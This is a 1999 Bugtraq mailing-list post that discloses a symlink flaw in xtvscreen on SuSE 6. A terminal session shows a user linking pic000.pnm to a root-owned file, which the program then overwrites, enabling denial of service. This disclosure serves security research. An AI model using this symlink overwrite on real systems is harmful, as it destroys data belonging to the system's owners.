Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

xtvscreen and suse 6

From: afafc () CAMOES RNL IST UTL PT (Andre Cruz)
Date: Thu, 18 Feb 1999 15:54:24 +0000

You can use xtvscreen to overwrite any file on the system.
Xtvscreen has a function to capture a snapshot and will write it as
pic000.pnm, pic001.pnm, etc in it's working directory. It follows
symlinks.
root@korn:/tmp > ls -l exp
-rw-r--r--   1 root     root            4 Feb 18 15:42 exp
edevil@korn:~ > ln -s /tmp/exp pic000.pnm
edevil@korn:~ > xtvscreen
Sound mixer initialized !
Using Visual TrueColor
msize: 0x00640000
/*
Start->Capture goes here
Start->Snapshot goes here */
[1]+  Stopped                 xtvscreen
edevil@korn:~ > cd /tmp
edevil@korn:/tmp > ls -l exp
-rw-r--r--   1 root     root       453135 Feb 18 15:47 exp
edevil@korn:/tmp >
I don't know how to write arbitrary data to the file but it can be used
for DoS.
If this is already known I'm sorry.

---
Andre Cruz
afafc () camoes rnl ist utl pt
Previous By Date Next
Previous By Thread Next

Current thread: